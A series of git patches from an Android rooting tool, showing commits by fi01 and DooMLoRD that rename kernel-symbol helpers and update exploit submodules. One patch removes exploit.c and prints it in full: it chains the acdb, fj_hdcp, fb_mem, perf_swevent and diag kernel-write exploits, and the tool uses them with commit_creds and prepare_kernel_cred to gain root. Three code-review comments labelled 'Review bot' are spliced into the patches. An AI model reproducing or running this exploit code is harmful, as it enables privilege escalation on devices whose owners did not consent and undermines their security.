return true; diff --git a/cred.h b/cred.h index 01d928f..7014e31 100644 --- a/cred.h +++ b/cred.h 
@@ -27,11 +27,11 @@ struct task_struct; typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *); typedef int (*commit_creds_t)(struct cred *); -extern bool get_prepare_kernel_cred_address(); -extern bool get_commit_creds_address(); +extern bool setup_prepare_kernel_cred_address(); +extern bool setup_commit_creds_address(); -extern bool get_prepare_kernel_cred_address_in_memory(void *mem, size_t length); -extern bool get_commit_creds_address_in_memory(void *mem, size_t length); +extern bool setup_prepare_kernel_cred_address_in_memory(void *mem, size_t length); +extern bool setup_commit_creds_address_in_memory(void *mem, size_t length); extern prepare_kernel_cred_t prepare_kernel_cred; extern commit_creds_t commit_creds; diff --git a/exploit.c b/exploit.c index a1f134a..1bcd9f5 100644 --- a/exploit.c +++ b/exploit.c @@ -1,3 +1,20 @@ +/* + * Copyright (C) 2013 fi01 + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + * + */ #include #include #include diff --git a/exploit.h b/exploit.h index 00cb5cb..e6aa746 100644 --- a/exploit.h +++ b/exploit.h @@ -1,5 +1,5 @@ /* - * Copyright (C) 2013 Hiroyuki Ikezoe + * Copyright (C) 2013 fi01 * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by diff --git a/main.c b/main.c index 69efba6..719923d 100644 --- a/main.c +++ b/main.c 
@@ -38,7 +38,7 @@ run_obtain_root_privilege(void *user_data) static bool run_exploit(void) { - get_ptmx_fops_fsync_address(); + setup_ptmx_fops_fsync_address(); if (!ptmx_fops_fsync_address) { return false; } @@ -80,7 +80,7 @@ find_ptmx_fops_address(void *mem, size_t length) return false; } - return get_ptmx_fops_address_in_memory(mem, length, &hint); + return setup_ptmx_fops_address_in_memory(mem, length, &hint); } bool find_variables_in_memory(void *mem, size_t length) @@ -111,8 +111,8 @@ bool find_variables_in_memory(void *mem, size_t length) } } - get_prepare_kernel_cred_address_in_memory(mem, length); - get_commit_creds_address_in_memory(mem, length); + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); return prepare_kernel_cred && commit_creds && ptmx_fops; } @@ -120,9 +120,9 @@ bool find_variables_in_memory(void *mem, size_t length) bool setup_variables(void) { - get_prepare_kernel_cred_address(); - get_commit_creds_address(); - get_ptmx_fops_address(); + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_ptmx_fops_address(); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; diff --git a/mm.c b/mm.c index f3f1ab4..e1e2b1d 100644 --- a/mm.c +++ b/mm.c @@ -17,7 +17,7 @@ int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, unsigned long pfn, unsigned long size, pgprot_t); bool -get_remap_pfn_range_address(void) +setup_remap_pfn_range_address(void) { if (remap_pfn_range) { return true; @@ -161,14 +161,14 @@ run_with_mmap(mmap_callback_t callback) return result; } - get_remap_pfn_range_address(); + setup_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); return false; } - get_ptmx_fops_mmap_address(); + setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops addresses.\n"); return false; 
diff --git a/mm.h b/mm.h index e052be6..edbb1a7 100644 --- a/mm.h +++ b/mm.h @@ -40,7 +40,7 @@ struct vm_area_struct { typedef bool (*mmap_callback_t)(void *mem, size_t length); -extern bool get_remap_pfn_range_address(void); +extern bool setup_remap_pfn_range_address(void); extern bool run_with_mmap(mmap_callback_t callback); extern void set_kernel_phys_offset(unsigned long int offset); diff --git a/ptmx.c b/ptmx.c index 5022a2e..fccafd9 100644 --- a/ptmx.c +++ b/ptmx.c @@ -9,7 +9,7 @@ unsigned long int ptmx_fops_mmap_address; unsigned long int ptmx_fops_fsync_address; bool -get_ptmx_fops_address(void) +setup_ptmx_fops_address(void) { if (ptmx_fops) { return true; @@ -25,10 +25,10 @@ get_ptmx_fops_address(void) } bool -get_ptmx_fops_mmap_address(void) +setup_ptmx_fops_mmap_address(void) { if (!ptmx_fops) { - get_ptmx_fops_address(); + setup_ptmx_fops_address(); if (!ptmx_fops) { return false; } @@ -39,10 +39,10 @@ get_ptmx_fops_mmap_address(void) } bool -get_ptmx_fops_fsync_address(void) +setup_ptmx_fops_fsync_address(void) { if (!ptmx_fops) { - get_ptmx_fops_address(); + setup_ptmx_fops_address(); if (!ptmx_fops) { return false; } @@ -53,7 +53,7 @@ get_ptmx_fops_fsync_address(void) } bool -get_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) +setup_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) { unsigned long int pattern[16]; void *address; diff --git a/ptmx.h b/ptmx.h index 9495ff2..2240445 100644 --- a/ptmx.h +++ b/ptmx.h 
@@ -29,12 +29,12 @@ typedef struct _find_ptmx_fops_hint_t { unsigned long int tty_fasync_address; } find_ptmx_fops_hint_t; -extern bool get_ptmx_fops_address(void); -extern bool get_ptmx_fops_mmap_address(void); -extern bool get_ptmx_fops_fsync_address(void); +extern bool setup_ptmx_fops_address(void); +extern bool setup_ptmx_fops_mmap_address(void); +extern bool setup_ptmx_fops_fsync_address(void); -extern bool get_ptmx_fops_address_in_memory(void *mem, size_t length, - find_ptmx_fops_hint_t *hint); +extern bool setup_ptmx_fops_address_in_memory(void *mem, size_t length, + find_ptmx_fops_hint_t *hint); extern void *ptmx_fops; extern unsigned long int ptmx_fops_mmap_address; From 74758cdad55e509929177a6bfea6172f4b054826 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 1 Aug 2013 14:24:54 +0900 Subject: [PATCH 069/125] Update for new kallsyms_in_memory_lookup_names API --- device_database | 2 +- libfb_mem_exploit | 2 +- libkallsyms | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- main.c | 24 +++++++++++++++--------- 6 files changed, 20 insertions(+), 14 deletions(-) diff --git a/device_database b/device_database index 6b6fdc8..3603408 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 6b6fdc850489ae9380a272e663bb4c9d1c661f6a +Subproject commit 3603408c4a37fe6856518cb3e3e0b0dfb5f3a761 diff --git a/libfb_mem_exploit b/libfb_mem_exploit index 02ca1c9..59377cc 160000 --- a/libfb_mem_exploit +++ b/libfb_mem_exploit @@ -1 +1 @@ -Subproject commit 02ca1c9ce0277b169373dde32f46386a3173f1b2 +Subproject commit 59377cc8b26f26ae8688080cda05158b5d3fb52b diff --git a/libkallsyms b/libkallsyms index 4c910a5..cfdca89 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 4c910a5580841d9fb2738804ae1b24dbd02834d2 +Subproject commit cfdca89d48c5447586e2cae489fc8b7091bfec15 diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 700defd..74d0503 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit 
@@ -1 +1 @@ -Subproject commit 700defd15d650a2195b3b2310cc1fa0e09d56e0f +Subproject commit 74d05030e526e0767c1b4fd1ef5374a70ac8046c diff --git a/libperf_event_exploit b/libperf_event_exploit index fe2f4f5..abaf4e5 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit fe2f4f501acf7f5a35e9415b7b4e944b914d69fd +Subproject commit abaf4e55aef0b384690e67f4edae2e089d0e8d0a diff --git a/main.c b/main.c index 719923d..5701afe 100644 --- a/main.c +++ b/main.c @@ -15,6 +15,7 @@ #include "mm.h" #include "ptmx.h" #include "exploit.h" +#include "libkallsyms/kallsyms_in_memory.h" void obtain_root_privilege(void) @@ -61,21 +62,21 @@ device_detected(void) } static bool -find_ptmx_fops_address(void *mem, size_t length) +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) { find_ptmx_fops_hint_t hint; - hint.ptmx_open_address = kallsyms_in_memory_lookup_name("ptmx_open"); + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); if (!hint.ptmx_open_address) { return false; } - hint.tty_release_address = kallsyms_in_memory_lookup_name("tty_release"); + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); if (!hint.tty_release_address) { return false; } - hint.tty_fasync_address = kallsyms_in_memory_lookup_name("tty_fasync"); + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); if (!hint.tty_fasync_address) { return false; } 
@@ -85,27 +86,32 @@ find_ptmx_fops_address(void *mem, size_t length) bool find_variables_in_memory(void *mem, size_t length) { + kallsyms *info; + printf("Search address in memroy...\n"); - if (kallsyms_in_memory_init(mem, length)) { + info = kallsyms_in_memory_init(mem, length); + if (info) { printf("Using kallsyms_in_memroy...\n"); if (!prepare_kernel_cred) { - prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name("prepare_kernel_cred"); + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); } if (!commit_creds) { - commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name("commit_creds"); + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); } if (!ptmx_fops) { - ptmx_fops = (void *)kallsyms_in_memory_lookup_name("ptmx_fops"); + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); if (!ptmx_fops) { - find_ptmx_fops_address(mem, length); + find_ptmx_fops_address(info, mem, length); } } + kallsyms_in_memory_free(info); + if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; } From 3d56f65236ef929ddacd0ede0403299ba3cb61cd Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 4 Aug 2013 22:11:34 +0530 Subject: [PATCH 070/125] updated subprojects --- device_database | 2 +- libdiagexploit | 2 +- libfb_mem_exploit | 2 +- libkallsyms | 2 +- libperf_event_exploit | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/device_database b/device_database index 3603408..548896c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 3603408c4a37fe6856518cb3e3e0b0dfb5f3a761 +Subproject commit 548896c31944d854c57c34d02dbaeeb92fe1a65d diff --git a/libdiagexploit b/libdiagexploit index 4dd7f1b..83a2e0c 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 +Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e 
diff --git a/libfb_mem_exploit b/libfb_mem_exploit index 59377cc..de67230 160000 --- a/libfb_mem_exploit +++ b/libfb_mem_exploit @@ -1 +1 @@ -Subproject commit 59377cc8b26f26ae8688080cda05158b5d3fb52b +Subproject commit de67230ff25909fb38417490fee745925898009a diff --git a/libkallsyms b/libkallsyms index cfdca89..cb04750 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit cfdca89d48c5447586e2cae489fc8b7091bfec15 +Subproject commit cb047501155601e7699e4653ba2067d6cf1087b4 diff --git a/libperf_event_exploit b/libperf_event_exploit index abaf4e5..48287d1 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit abaf4e55aef0b384690e67f4edae2e089d0e8d0a +Subproject commit 48287d1ad1bf9c7fb9422931bab6e136ea574817 From c88e432fc6b4729be31eeb866f7b454ec67561dc Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sun, 4 Aug 2013 22:17:42 +0530 Subject: [PATCH 071/125] updated subprojects --- device_database | 2 +- libperf_event_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 548896c..eef5d06 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 548896c31944d854c57c34d02dbaeeb92fe1a65d +Subproject commit eef5d06967a3df185baebc7dadae43b423f0e71e diff --git a/libperf_event_exploit b/libperf_event_exploit index 48287d1..92594d4 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 48287d1ad1bf9c7fb9422931bab6e136ea574817 +Subproject commit 92594d4177c238e1231489c1f1be23529e23f2bf From 962135db06ac0e682142913b50e542cb7608dd56 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 8 Aug 2013 14:36:30 +0900 Subject: [PATCH 072/125] subproject with latest commits --- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index eef5d06..22c7db1 160000 --- a/device_database 
+++ b/device_database @@ -1 +1 @@ -Subproject commit eef5d06967a3df185baebc7dadae43b423f0e71e +Subproject commit 22c7db1fe12f1d43ba94908f18302eeb87d5aa87 diff --git a/libdiagexploit b/libdiagexploit index 83a2e0c..4dd7f1b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e +Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 diff --git a/libperf_event_exploit b/libperf_event_exploit index 92594d4..e66611f 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 92594d4177c238e1231489c1f1be23529e23f2bf +Subproject commit e66611f7fe1fe5acd308127d581d4fa81ee661fe From ddf7e79878f3eada8276e96527b1c268dea44551 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 23 Aug 2013 09:13:24 +0900 Subject: [PATCH 073/125] subproject with latest commits --- device_database | 2 +- libmsm_acdb_exploit | 2 +- libperf_event_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 22c7db1..27e25ff 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 22c7db1fe12f1d43ba94908f18302eeb87d5aa87 +Subproject commit 27e25ff074200baca24170482888df14d6e9292b diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 74d0503..6ec9088 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 74d05030e526e0767c1b4fd1ef5374a70ac8046c +Subproject commit 6ec9088d0bdef05cf1ab7ad8c9546914631cb92f diff --git a/libperf_event_exploit b/libperf_event_exploit index e66611f..57b6ff9 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit e66611f7fe1fe5acd308127d581d4fa81ee661fe +Subproject commit 57b6ff9021840fb360469c70d205e4246a420c48 From d69e8a386276bb53b0fd5daa2d5a973bffd54443 Mon Sep 17 00:00:00 2001 
From: fi01 Date: Wed, 28 Aug 2013 12:23:12 +0900 Subject: [PATCH 074/125] Use libexploit submodule --- .gitmodules | 3 + Android.mk | 8 +-- exploit.c | 191 ---------------------------------------------------- exploit.h | 38 ----------- libexploit | 1 + main.c | 2 +- mm.c | 6 +- mm.h | 4 +- 8 files changed, 14 insertions(+), 239 deletions(-) delete mode 100644 exploit.c delete mode 100644 exploit.h create mode 160000 libexploit diff --git a/.gitmodules b/.gitmodules index b968e90..fea3c72 100644 --- a/.gitmodules +++ b/.gitmodules @@ -19,3 +19,6 @@ [submodule "libfb_mem_exploit"] path = libfb_mem_exploit url = https://github.com/android-rooting-tools/libfb_mem_exploit.git +[submodule "libexploit"] + path = libexploit + url = https://github.com/android-rooting-tools/libexploit.git diff --git a/Android.mk b/Android.mk index 7961685..34396cd 100644 --- a/Android.mk +++ b/Android.mk @@ -7,13 +7,13 @@ LOCAL_SRC_FILES := \ kallsyms.c \ main.c \ mm.c \ - ptmx.c \ - exploit.c + ptmx.c LOCAL_MODULE := run_root_shell LOCAL_MODULE_TAGS := optional -LOCAL_STATIC_LIBRARIES := libdiagexploit -LOCAL_STATIC_LIBRARIES += libdevice_database +LOCAL_STATIC_LIBRARIES := libdevice_database +LOCAL_STATIC_LIBRARIES += libexploit +LOCAL_STATIC_LIBRARIES += libdiagexploit LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit diff --git a/exploit.c b/exploit.c deleted file mode 100644 index 1bcd9f5..0000000 --- a/exploit.c +++ /dev/null 
@@ -1,191 +0,0 @@ -/* - * Copyright (C) 2013 fi01 - * - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - * - */ -#include -#include -#include -#include - -#include "exploit.h" -#include "mm.h" -#include "device_database.h" -#include "libdiagexploit/diag.h" -#include "libperf_event_exploit/perf_event.h" -#include "libmsm_acdb_exploit/acdb.h" -#include "libfj_hdcp_exploit/fj_hdcp.h" -#include "libfb_mem_exploit/fb_mem.h" - -typedef struct _callback_info_t { - exploit_callback_t func; - void *param; - bool result; -} callback_info_t; - -static bool -run_callback(void *param) -{ - callback_info_t *info = param; - - info->result = info->func(info->param); - - return true; -} - -static bool -attempt_diag_exploit(unsigned long int address, - unsigned long int write_value, - callback_info_t *info) -{ - struct diag_values injection_data; - - if (write_value > (uint16_t)-1) { - return false; - } - - injection_data.address = address; - injection_data.value = (uint16_t)write_value; - - return diag_run_exploit(&injection_data, 1, &run_callback, info); -} - -static bool -attempt_acdb_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - callback_info_t *info) -{ - if (acdb_run_exploit(address, write_value, &run_callback, info)) { - acdb_write_value_at_address(address, restore_value); - - return true; - } - - return false; -} - -static bool 
-attempt_fj_hdcp_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - callback_info_t *info) -{ - if (fj_hdcp_run_exploit(address, write_value, &run_callback, info)) { - fj_hdcp_write_value_at_address(address, restore_value); - - return true; - } - - return false; -} - -static bool -attempt_fb_mem_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - callback_info_t *info) -{ - unsigned long int kernel_physical_offset; - - kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); - if (kernel_physical_offset) { - fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); - } - - if (fb_mem_write_value_at_address(address, write_value)) { - run_callback(info); - - fb_mem_write_value_at_address(address, restore_value); - - return true; - } - - return false; -} - -bool -attempt_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - exploit_callback_t callback_func, - void *callback_param) -{ - callback_info_t info; - - info.func = callback_func; - info.param = callback_param; - info.result = false; - - // Attempt exploits in most stable order - - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(address, write_value, restore_value, &info)) { - return info.result; - } - printf("\n"); - - printf("Attempt fj_hdcp exploit...\n"); - if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) { - return info.result; - } - printf("\n"); - - printf("Attempt fb_mem exploit...\n"); - if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) { - return info.result; - } - printf("\n"); - - printf("Attempt perf_swevent exploit...\n"); - if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) { - return info.result; - } - printf("\n"); - - if (attempt_diag_exploit(address, write_value, &info)) { - return info.result; - } - - return 
false; -} - -bool -attempt_mmap_exploit(exploit_mmap_callback_t callback_func, void *callback_param) -{ - unsigned long int kernel_physical_offset; - int fd; - void *address; - bool result; - - kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); - if (kernel_physical_offset) { - fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); - } - - printf("Attempt fb_mem exploit...\n"); - address = fb_mem_mmap(&fd); - if (address == MAP_FAILED) { - return false; - } - - result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), - KERNEL_SIZE, - callback_param); - - fb_mem_munmap(address, fd); - - return result; -} diff --git a/exploit.h b/exploit.h deleted file mode 100644 index e6aa746..0000000 --- a/exploit.h +++ /dev/null 
@@ -1,38 +0,0 @@ -/* - * Copyright (C) 2013 fi01 - * - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - * - */ -#ifndef __EXPLOIT_H__ -#define __EXPLOIT_H__ - -#include - -typedef bool (*exploit_callback_t)(void *param); -typedef bool (*exploit_mmap_callback_t)(void *mem, size_t length, void *param); - -extern bool attempt_exploit(unsigned long int address, - unsigned long int write_value, - unsigned long int restore_value, - exploit_callback_t callback_func, - void *callback_param); - -extern bool attempt_mmap_exploit(exploit_mmap_callback_t callback_func, - void *callback_param); - -#endif /* __EXPLOIT_H__ */ -/* -vi:ts=2:nowrap:ai:expandtab:sw=2 -*/ diff --git a/libexploit b/libexploit new file mode 160000 index 0000000..2c13202 --- /dev/null +++ b/libexploit @@ -0,0 +1 @@ +Subproject commit 2c132029ebc7d9afa6435b1cf858ccff16ea427c diff --git a/main.c b/main.c index 5701afe..5aba2a0 100644 --- a/main.c +++ b/main.c @@ -14,7 +14,7 @@ #include "cred.h" #include "mm.h" #include "ptmx.h" -#include "exploit.h" +#include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" void diff --git a/mm.c b/mm.c index e1e2b1d..0260a3a 100644 --- a/mm.c +++ b/mm.c 
@@ -3,13 +3,15 @@ #include #include -#include "exploit.h" #include "kallsyms.h" #include "mm.h" #include "ptmx.h" -#include "libdiagexploit/diag.h" +#include "libexploit/exploit.h" #include "device_database/device_database.h" +#define PAGE_OFFSET 0xc0000000 +#define KERNEL_SIZE 0x02000000 + static unsigned long int kernel_phys_offset; diff --git a/mm.h b/mm.h index edbb1a7..2a0ae67 100644 --- a/mm.h +++ b/mm.h @@ -20,9 +20,7 @@ #include #include - -#define PAGE_OFFSET 0xc0000000 -#define KERNEL_SIZE 0x10000000 +#include struct file; From 7ebc7ca9404383a53bd6531710441ee32d0a5f3a Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 28 Aug 2013 11:57:30 +0900 Subject: [PATCH 075/125] Do not call function kallsyms_in_memory_free() to avoid crash with fb_mem exploit --- main.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/main.c b/main.c index 5aba2a0..2ce0a2b 100644 --- a/main.c +++ b/main.c @@ -110,7 +110,8 @@ bool find_variables_in_memory(void *mem, size_t length) } } - kallsyms_in_memory_free(info); + //FIXME: do not free to avoid crash with fb_mem exploit + //kallsyms_in_memory_free(info); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; From a9a7d52137cedd641c36901d9273cfda4c64df38 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Wed, 11 Sep 2013 22:51:54 +0530 Subject: [PATCH 076/125] update subprojects --- device_database | 2 +- libdiagexploit | 2 +- libmsm_acdb_exploit | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 27e25ff..786620e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 27e25ff074200baca24170482888df14d6e9292b +Subproject commit 786620e68aae4dece057478ea52ed1c67e900db8 diff --git a/libdiagexploit b/libdiagexploit index 4dd7f1b..83a2e0c 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 +Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e 
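Review bot: The new `#define KERNEL_SIZE 0x02000000` in mm.c is not the value this same commit removes from mm.h (`0x10000000`), so what reads as a header-to-source move also cuts the size of the kernel range that mm.c maps by a factor of eight, with no comment saying why. If the smaller bound is deliberate (presumably a tighter estimate of how far past PAGE_OFFSET the symbol search needs to read), record it on the define: `#define KERNEL_SIZE 0x02000000 /* bytes mapped from PAGE_OFFSET for the in-memory search; was 0x10000000 in mm.h */`. If it is accidental, any symbol or table beyond 32 MiB from PAGE_OFFSET will no longer be found. The code that consumes KERNEL_SIZE is outside this hunk.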
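Review bot: Commenting out `kallsyms_in_memory_free(info)` leaks the kallsyms info on every call of find_variables_in_memory and hides whatever makes the free crash under the fb_mem exploit instead of fixing it. A plausible cause, to be confirmed, is that `info` or something it owns still points into the exploit's mapping, which is gone by the time the free runs; if so the free belongs before the mapping is torn down, or the library must copy what it keeps. At minimum the FIXME should state the hypothesis and the cost: `//FIXME: kallsyms_in_memory_free() crashes under fb_mem (info may reference the unmapped region?); leaking until fixed`. find_variables_in_memory begins before the hunk.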
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 6ec9088..56e59f2 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 6ec9088d0bdef05cf1ab7ad8c9546914631cb92f
+Subproject commit 56e59f2c7cc1ed8d195c1b339c9d05a8cf39531a
From 194ab4969d95638b4bde5ddd77c758b8555353bb Mon Sep 17 00:00:00 2001
From: DooMLoRD
Date: Thu, 12 Sep 2013 05:05:24 +0530
Subject: [PATCH 077/125] update subprojects
---
device_database | 2 +-
libperf_event_exploit | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 786620e..f2f6b28 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 786620e68aae4dece057478ea52ed1c67e900db8
+Subproject commit f2f6b28deb57afd4ec9c650f0e8c1e2f3faf26cd
diff --git a/libperf_event_exploit b/libperf_event_exploit
index 57b6ff9..4d90962 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit 57b6ff9021840fb360469c70d205e4246a420c48
+Subproject commit 4d90962c7a24dcfff7b1977f5eff1420b343f65e
From b8daabc21f091c13389e6fae490fca94e72fc4fb Mon Sep 17 00:00:00 2001
From: fi01
Date: Mon, 23 Sep 2013 23:28:23 +0900
Subject: [PATCH 078/125] update subprojects
---
device_database | 2 +-
libdiagexploit | 2 +-
libmsm_acdb_exploit | 2 +-
libperf_event_exploit | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/device_database b/device_database
index f2f6b28..765d935 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit f2f6b28deb57afd4ec9c650f0e8c1e2f3faf26cd
+Subproject commit 765d935473fcfba4391a4a926c47f32f26ea16b3
diff --git a/libdiagexploit b/libdiagexploit
index 83a2e0c..4dd7f1b 160000
--- a/libdiagexploit
+++ b/libdiagexploit
@@ -1 +1 @@
-Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e
+Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 56e59f2..09ca61d 160000
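Review bot: The libdiagexploit gitlink in this "update subprojects" commit moves backward, from 83a2e0c to 4dd7f1b, which is precisely the commit the earlier DooMLoRD update (patch 076) had moved away from, while every other submodule in the same commit moves forward. That pattern usually means a stale local checkout of the submodule was swept up by the commit rather than an intended revert; if the downgrade is intended, the subject should say so, because a pinned exploit library silently going back a version is exactly the kind of supply-chain change a reviewer needs to notice. Either re-pin after `git submodule update --remote libdiagexploit`, or document the pin in the commit message.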
--- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 56e59f2c7cc1ed8d195c1b339c9d05a8cf39531a +Subproject commit 09ca61dfd4c40910d70e7fd34f63be282aacda0e diff --git a/libperf_event_exploit b/libperf_event_exploit index 4d90962..87beb66 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 4d90962c7a24dcfff7b1977f5eff1420b343f65e +Subproject commit 87beb6660aa2e7ef1b87df3c3643078f0d4bc209 From dec63129a613124a1800749083f3b89936025f8a Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 3 Oct 2013 17:53:38 +0900 Subject: [PATCH 079/125] Add libmsm_cameraconfig_exploit --- .gitmodules | 3 +++ Android.mk | 1 + libexploit | 2 +- libmsm_cameraconfig_exploit | 1 + 4 files changed, 6 insertions(+), 1 deletion(-) create mode 160000 libmsm_cameraconfig_exploit diff --git a/.gitmodules b/.gitmodules index fea3c72..11e896e 100644 --- a/.gitmodules +++ b/.gitmodules @@ -22,3 +22,6 @@ [submodule "libexploit"] path = libexploit url = https://github.com/android-rooting-tools/libexploit.git +[submodule "libmsm_cameraconfig_exploit"] + path = libmsm_cameraconfig_exploit + url = git://github.com/fi01/libmsm_cameraconfig_exploit.git diff --git a/Android.mk b/Android.mk index 34396cd..e836ad9 100644 --- a/Android.mk +++ b/Android.mk @@ -18,6 +18,7 @@ LOCAL_STATIC_LIBRARIES += libperf_event_exploit LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit 